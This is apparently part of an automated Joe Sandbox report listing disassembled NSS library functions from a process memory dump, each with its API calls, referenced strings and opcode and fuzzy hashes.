Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07CD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07D6
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C68204A), ref: 6C6F07E4
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,6C68204A), ref: 6C6F0864
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6F0880
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C68204A), ref: 6C6F08CB
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08D7
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08FB

PR_Free.NSS3(?), ref: 6C6F0A6C
PR_Free.NSS3(?), ref: 6C6F0A87

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Value$Freecalloc$mallocmemcpy
String ID:
API String ID: 207547555-0
Opcode ID: 4a1a8479e87e8138b4834f96b0ff712a9c3d4e1c025d70ce3ed22541f09ba349
Instruction ID: 850e14869ce0be7a5fb3c6c80d7aee1b184faf847549d6828b6d6157aab9a4a4
Opcode Fuzzy Hash: 4a1a8479e87e8138b4834f96b0ff712a9c3d4e1c025d70ce3ed22541f09ba349
Instruction Fuzzy Hash: 461166B1900B81CBE7609F29CA8575373AAFF0230CF40283AD82642E02EB30F445CB95

Function 6C718FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON

Download Yara Rule

APIs

PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C720710), ref: 6C718FF1
PR_CallOnce.NSS3(6C862158,6C719150,00000000,?,?,?,6C719138,?,6C720710), ref: 6C719029
calloc.MOZGLUE(00000001,00000000,?,?,6C720710), ref: 6C71904D
memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C720710), ref: 6C719066
PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C720710), ref: 6C719078

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: PrivateThread$CallOncecallocmemcpy
String ID:
API String ID: 1176783091-0
Opcode ID: 05b17bdb0d7897fe50ab33c3968bb2685e246feb0cc7800625f6cac7a5f3b4db
Instruction ID: 84e839780bfae05ab4ee899eeaa982a20e28641ff2f82ef6783ac49bcb736dac
Opcode Fuzzy Hash: 05b17bdb0d7897fe50ab33c3968bb2685e246feb0cc7800625f6cac7a5f3b4db
Instruction Fuzzy Hash: 08114461B082135BE7201AAEAD04A7672ACEB927ACF480431FC84C2F40F352CD46C3F9

Function 6C72CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C741E10: TlsGetValue.KERNEL32 ref: 6C741E36
Part of subcall function 6C741E10: EnterCriticalSection.KERNEL32(?,?,?,6C71B1EE,2404110F,?,?), ref: 6C741E4B
Part of subcall function 6C741E10: PR_Unlock.NSS3 ref: 6C741E76

free.MOZGLUE(?,6C72D079,00000000,00000001), ref: 6C72CDA5
PK11_FreeSymKey.NSS3(?,6C72D079,00000000,00000001), ref: 6C72CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C72D079,00000000,00000001), ref: 6C72CDCF
DeleteCriticalSection.KERNEL32(?,6C72D079,00000000,00000001), ref: 6C72CDE2
free.MOZGLUE(?), ref: 6C72CDE9

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: dc5804417c6803546dd7d1cd8dfffd925d66b7c8ea6470fd9f04519a2c567804
Instruction ID: 6ab783935ea170ae396a609ccec168f2f93d705ef1b8d89b00f74d4b05b895ec
Opcode Fuzzy Hash: dc5804417c6803546dd7d1cd8dfffd925d66b7c8ea6470fd9f04519a2c567804
Instruction Fuzzy Hash: 4F11C2B6B01111BBEB00AE65EE49D96B72DFF1426E7144131F90987E01E73AE434CBE1

Function 6C792CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C795B40: PR_GetIdentitiesLayer.NSS3 ref: 6C795B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C792CEC

Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF

PR_EnterMonitor.NSS3(?), ref: 6C792D02
PR_EnterMonitor.NSS3(?), ref: 6C792D1F
PR_ExitMonitor.NSS3(?), ref: 6C792D42
PR_ExitMonitor.NSS3(?), ref: 6C792D5B

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: 227605bb550a852316d7537ec0fd3da1ad8c12a7b3ee79bfc6ea44c27c847977
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: AF0104B1A40604AFE770AE25FD4ABC7B3A1EF51318F004535E85986721E332F9158793

Function 6C792D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C795B40: PR_GetIdentitiesLayer.NSS3 ref: 6C795B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C792D9C

Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF

PR_EnterMonitor.NSS3(?), ref: 6C792DB2
PR_EnterMonitor.NSS3(?), ref: 6C792DCF
PR_ExitMonitor.NSS3(?), ref: 6C792DF2
PR_ExitMonitor.NSS3(?), ref: 6C792E0B

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: 483e3222dea85e673eb9206e100f7b11d724fa840afe2f41ec313362b6ab21d7
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: A901C4B1A50200AFEB70AE25FD4DBC7B7A5EF51318F004535E85986B22D732F9258693

Function 6C72AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6C713090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C72AE42), ref: 6C7130AA
Part of subcall function 6C713090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7130C7
Part of subcall function 6C713090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C7130E5
Part of subcall function 6C713090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C713116
Part of subcall function 6C713090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C71312B
Part of subcall function 6C713090: PK11_DestroyObject.NSS3(?,?), ref: 6C713154
Part of subcall function 6C713090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C71317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C7099FF,?,?,?,?,?,?,?,?,?,6C702D6B,?), ref: 6C72AE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C7099FF,?,?,?,?,?,?,?,?,?,6C702D6B,?), ref: 6C72AE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C702D6B,?,?,00000000), ref: 6C72AE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C702D6B,?,?,00000000), ref: 6C72AE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C702D6B,?,?), ref: 6C72AEA3

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: 5aa0bb8df06cdbe7299684072cfa83b62bae8e98efdb4ce953bc48fe4c565754
Instruction ID: 9dcef20888e979726880f27eee0bd9513f226b2d0f46207e4b002ddce322b606
Opcode Fuzzy Hash: 5aa0bb8df06cdbe7299684072cfa83b62bae8e98efdb4ce953bc48fe4c565754
Instruction Fuzzy Hash: BF01A4ABF1411057E701A16CAE9FAAF315C8B8766CF080432E909D7B41FA1AD91A42E3

Function 6C810930 Relevance: 7.5, APIs: 5, Instructions: 45fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,6C810C83), ref: 6C81094F
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C810C83), ref: 6C810974
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C810983
_PR_MD_UNLOCK.NSS3(?,?,6C810C83), ref: 6C81099F
OutputDebugStringA.KERNEL32(?,?,6C810C83), ref: 6C8109B2

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalDebugEnterOutputSectionStringfflushfwrite
String ID:
API String ID: 1872382454-0
Opcode ID: 49cc65fca212c4a82489515d83b90a4a0a3ab9cd326d045da1a41720d508fd81
Instruction ID: 64ec76a1059e95aa2df788a50bdd82aeb2e379618c1f325d7c39a3fcbfa34efa
Opcode Fuzzy Hash: 49cc65fca212c4a82489515d83b90a4a0a3ab9cd326d045da1a41720d508fd81
Instruction Fuzzy Hash: 35015BB87051409FDF20AF29CC99B653BB9AB4631CF086525E44683663D779E850CA91

Function 6C817C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON

Download Yara Rule

APIs

PR_Free.NSS3(?), ref: 6C817C73
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C817C83
malloc.MOZGLUE(00000001), ref: 6C817C8D
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C817C9F
PR_GetCurrentThread.NSS3 ref: 6C817CAD

Part of subcall function 6C7C9BF0: TlsGetValue.KERNEL32(?,?,?,6C810A75), ref: 6C7C9C07

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CurrentFreeThreadValuemallocstrcpystrlen
String ID:
API String ID: 105370314-0
Opcode ID: b62018073d0029e9442821989eb10377335aa50ab2c22a577a1044bbc618799b
Instruction ID: af4238cdeea41dcecf73d11d0d1d0b3df89830cc92456ad3813c64d98c3ffacb
Opcode Fuzzy Hash: b62018073d0029e9442821989eb10377335aa50ab2c22a577a1044bbc618799b
Instruction Fuzzy Hash: 63F0AFB1A142076BEB509F7A9E099477B98EF05269B018839E80DC3F00EB34E114CAE5

Function 6C81ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C81A6D8), ref: 6C81AE0D
free.MOZGLUE(?), ref: 6C81AE14
DeleteCriticalSection.KERNEL32(6C81A6D8), ref: 6C81AE36
free.MOZGLUE(?), ref: 6C81AE3D
free.MOZGLUE(00000000,00000000,?,?,6C81A6D8), ref: 6C81AE47

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 24dd25d7ec3332671265cf2718fc18a938553541a3064c27bfae125ef55b8152
Instruction ID: b5c751b0eb89d8096ec1b6ef18932caf382bfc4d7691b9dd71cf534d818966b2
Opcode Fuzzy Hash: 24dd25d7ec3332671265cf2718fc18a938553541a3064c27bfae125ef55b8152
Instruction Fuzzy Hash: B3F0F6B9601A02A7CA219F68D8089577BB8BF8A778B100338F12A83941D775E015CFD1

Function 6C6988D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,01DC7D83), ref: 6C698990

Strings

@zjl, xrefs: 6C698A31

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: memset
String ID: @zjl
API String ID: 2221118986-941671673
Opcode ID: 516eb76d00f942276d3fa57fc3bf4dfb04864a105f175d3e43f81370ec0b6ab0
Instruction ID: 0fca199d8a2c861598e2bae72930efd900f50a84eae1b86c0ebe232d286183f1
Opcode Fuzzy Hash: 516eb76d00f942276d3fa57fc3bf4dfb04864a105f175d3e43f81370ec0b6ab0
Instruction Fuzzy Hash: 2151C271A057829FC704CF68C1946A6BBF0BF59308F24969DC8884BB12D335F596CBE5

Function 6C6A7C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6A7D35

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6A7D13, 6C6A7D1F, 6C6A7D47, 6C6A7D53, 6C6A7D5F
database corruption, xrefs: 6C6A7D29
%s at line %d of [%.10s], xrefs: 6C6A7D2E

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: a1d30d9cc792bb0af1f21816b6ad6d505ed647540ce48dd04f10b953f1380fce
Instruction ID: 126519af548bbbe1cd354441175ccc61fa0aea9f06e3c9030062434c978d00ff
Opcode Fuzzy Hash: a1d30d9cc792bb0af1f21816b6ad6d505ed647540ce48dd04f10b953f1380fce
Instruction Fuzzy Hash: 6A311471E042299BC710CFDDC880DBAB7F1EF84709B594596E448B7B8AD270DC42C7A8

Function 6C696C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C696D36

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C696D20
database corruption, xrefs: 6C696D2A
%s at line %d of [%.10s], xrefs: 6C696D2F

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: fbf1f7f2ccfdc05922cde785e4760a9503b079a7e60315d1951ad91c5b83d2a2
Instruction ID: 3cc0797cf18f19c7f01b0ef6179f22abbc2394e160a51d4ee27c172615045c54
Opcode Fuzzy Hash: fbf1f7f2ccfdc05922cde785e4760a9503b079a7e60315d1951ad91c5b83d2a2
Instruction Fuzzy Hash: 562124706003069BC710CF19C941B9AB7F1AF81308F14892DD8599BFA1E370F949C7EA

Function 6C772FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+wl,6C7732C2,<+wl,00000000,00000000,?), ref: 6C772FDA

Part of subcall function 6C7614C0: TlsGetValue.KERNEL32 ref: 6C7614E0
Part of subcall function 6C7614C0: EnterCriticalSection.KERNEL32 ref: 6C7614F5
Part of subcall function 6C7614C0: PR_Unlock.NSS3 ref: 6C76150D

PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C77300B

Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C

SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C77302A

Part of subcall function 6C760840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7608B4

Part of subcall function 6C74C3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C74C45D
Part of subcall function 6C74C3D0: TlsGetValue.KERNEL32 ref: 6C74C494
Part of subcall function 6C74C3D0: EnterCriticalSection.KERNEL32(?), ref: 6C74C4A9
Part of subcall function 6C74C3D0: PR_Unlock.NSS3(?), ref: 6C74C4F4

Strings

<+wl, xrefs: 6C772FD0

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
String ID: <+wl
API String ID: 2538134263-2346447686
Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction ID: 44ae7621f7e6fa7872c35736310ed8cf14557e7e6f012f96a142b0fc750dc1a2
Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction Fuzzy Hash: 3911C4B6B001086BDF008E65AD09A9B779AAB8436CF184134EC1CD7B81E772E915C7A1

Function 6C7CCC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C7CCD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C7CCC7B), ref: 6C7CCD7A
Part of subcall function 6C7CCD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C7CCD8E
Part of subcall function 6C7CCD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C7CCDA5
Part of subcall function 6C7CCD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C7CCDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C7CCCB5
memcpy.VCRUNTIME140(6C8614F4,6C8602AC,00000090), ref: 6C7CCCD3
memcpy.VCRUNTIME140(6C861588,6C8602AC,00000090), ref: 6C7CCD2B

Part of subcall function 6C6E9AC0: socket.WSOCK32(?,00000017,6C6E99BE), ref: 6C6E9AE6
Part of subcall function 6C6E9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C6E99BE), ref: 6C6E9AFC

Part of subcall function 6C6F0590: closesocket.WSOCK32(6C6E9A8F,?,?,6C6E9A8F,00000000), ref: 6C6F0597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6C7CCCB0

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

